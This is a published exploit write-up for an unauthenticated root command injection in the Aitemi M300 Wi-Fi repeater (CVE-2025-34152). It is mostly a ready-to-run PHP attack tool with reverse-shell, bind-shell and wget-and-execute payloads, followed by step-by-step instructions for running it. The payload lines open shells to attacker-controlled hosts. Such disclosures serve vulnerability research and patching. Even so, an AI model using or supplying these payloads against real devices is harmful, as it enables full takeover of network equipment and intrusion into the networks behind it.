=============================================================================================================================================
| # Title     : Shenzhen Aitemi M300 Wi-Fi Repeater PHP Code Exploit                                                                        |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : https://www.ebay.com/itm/404211745927                                                                                       |
=============================================================================================================================================

POC : 

[+] General Information
----------------------
- Vulnerability Name: Shenzhen Aitemi M300 Wi-Fi Repeater – Unauthenticated RCE (https://packetstorm.news/files/id/209361/)
- CVE ID: CVE-2025-34152
- Vulnerability Type: Remote Command Injection – Unauthenticated
- Privilege Level: Root
- Severity: Critical (10/10)

2. Vulnerability Description
----------------------------
The Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) contains an unauthenticated
remote command injection vulnerability in the "time" parameter handled by:

    protocol.csp?fname=system&opt=time_conf&function=set

The parameter is passed directly into:

    date -s "$time"

Because user-supplied input is unsanitized, an attacker can inject backtick-executed
shell commands:

    time=`COMMAND`

These commands execute with full root privileges without requiring authentication.

3. Exploitation
----------------
Example malicious injection:

    time=`sh -i >& /dev/tcp/ATTACKER_IP/4444 0>&1`

URL-encoded version:

    time=%60sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2F4444%200%3E%261%60

The payload is delivered through an unauthenticated POST request.

4. Security Impact
------------------
- Full remote command execution as root
- No authentication required
- No reboot needed
- Immediate full compromise of the device
- Allows uploading, downloading, deleting files
- Enables persistent backdoors
- May give access to the entire network environment

5. Recommendations
------------------
- Update firmware as soon as possible
- Restrict access to port 80
- Place the device behind a firewall/WAF
- Avoid exposing the repeater to WAN environments

===================================================================
6. Full Converted PHP Exploit Code
===================================================================

<?php

class AitemiM300_Advanced {

    private $target;
    private $port;
    private $path;
    private $logFile = "exploit-log.txt";

    public function __construct($target, $port = 80, $path = "/") {
        $this->target = rtrim($target, '/');
        $this->port = $port;
        $this->path = $path;
    }

    private function log($txt) {
        file_put_contents($this->logFile, "[" . date("Y-m-d H:i:s") . "] $txt\n", FILE_APPEND);
    }

    private function sendReq($method, $uri, $data = null, $headers = []) {
        $url = "http://{$this->target}:{$this->port}{$uri}";
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

        if ($data) curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        if ($headers) curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

        $body = curl_exec($ch);
        $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        $this->log("HTTP $method $uri => Code $code");
        return ['body' => $body, 'code' => $code];
    }

    public function check() {

        $res = $this->sendReq("GET", "/favicon.ico");

        if ($res['code'] !== 200) {
            return "SAFE: favicon.ico missing – likely not vulnerable.";
        }

        $hash = hash("sha256", $res['body']);
        if ($hash === "eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee") {
            return "✓ Appears: Aitemi M300 device confirmed.";
        }

        return "UNKNOWN: Unable to verify device identity.";
    }

    public function exploit($cmd) {

        $raw  = "`$cmd`";
        $enc  = urlencode($raw);
        $enc  = str_replace("+", "%20", $enc);

        $data = "fname=system&opt=time_conf&function=set&time=$enc";

        $headers = [
            "Content-Type: application/x-www-form-urlencoded"
        ];

        return $this->sendReq("POST", "/protocol.csp?", $data, $headers);
    }

    public function payload_reverse_shell($ip, $port) {
        return "sh -i >& /dev/tcp/$ip/$port 0>&1";
    }

    public function payload_bind_shell($port = 4444) {
        return "nc -lp $port -e /bin/sh";
    }

    public function payload_mips_wget($url) {
        return "wget $url -O /tmp/x; chmod +x /tmp/x; /tmp/x";
    }

    public function payload_pingback($ip) {
        return "ping -c 1 $ip";
    }

    public function run_payload($payload) {
        return $this->exploit($payload);
    }

}

// Example Usage:
$exp = new AitemiM300_Advanced("192.168.1.1");

echo $exp->check() . "\n";

$payload = $exp->payload_reverse_shell("192.168.1.100", 4444);
$exp->run_payload($payload);

echo "✓ Payload sent...\n";
?>

===================================================================
7. How To Save And Execute The PHP Exploit Code
===================================================================

Follow the steps below to properly save and run the converted PHP exploit code.

1. Saving The Exploit
---------------------
- Open a text editor such as Notepad, Notepad++, Sublime Text, or VSCode.
- Copy the full PHP exploit code block from section 6.
- Save the file as:

    aitemi_m300_rce.php

- Make sure the file extension is `.php` and the encoding is UTF‑8.

2. Preparing The Environment
----------------------------
The exploit requires:
- PHP 7.x or PHP 8.x installed.
- cURL support enabled (php‑curl extension).
- Internet / network access to the target device.

Check PHP version:

    php -v

Check curl module:

    php -m | findstr curl   (Windows)
    php -m | grep curl       (Linux)

3. Running The Exploit (Windows)
--------------------------------
Open Command Prompt or PowerShell:

    cd C:\path\to\exploit\
    php aitemi_m300_rce.php

4. Running The Exploit (Linux / macOS)
--------------------------------------
Terminal:

    cd /path/to/exploit/
    php aitemi_m300_rce.php

Run in background:

    nohup php aitemi_m300_rce.php &

5. Customizing Payloads
-----------------------
Modify:

    $exp = new AitemiM300_Advanced("192.168.1.1");

Reverse shell:

    $payload = $exp->payload_reverse_shell("YOUR_IP", 4444);

Bind shell:

    $payload = $exp->payload_bind_shell(5555);

MIPS wget payload:

    $payload = $exp->payload_mips_wget("http://YOUR_IP/mips.bin");

Execute:

    $exp->run_payload($payload);

6. Verifying RCE
----------------
- Reverse shell connection  
- Pingback  
- exploit-log.txt  
- Observed device behavior  


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================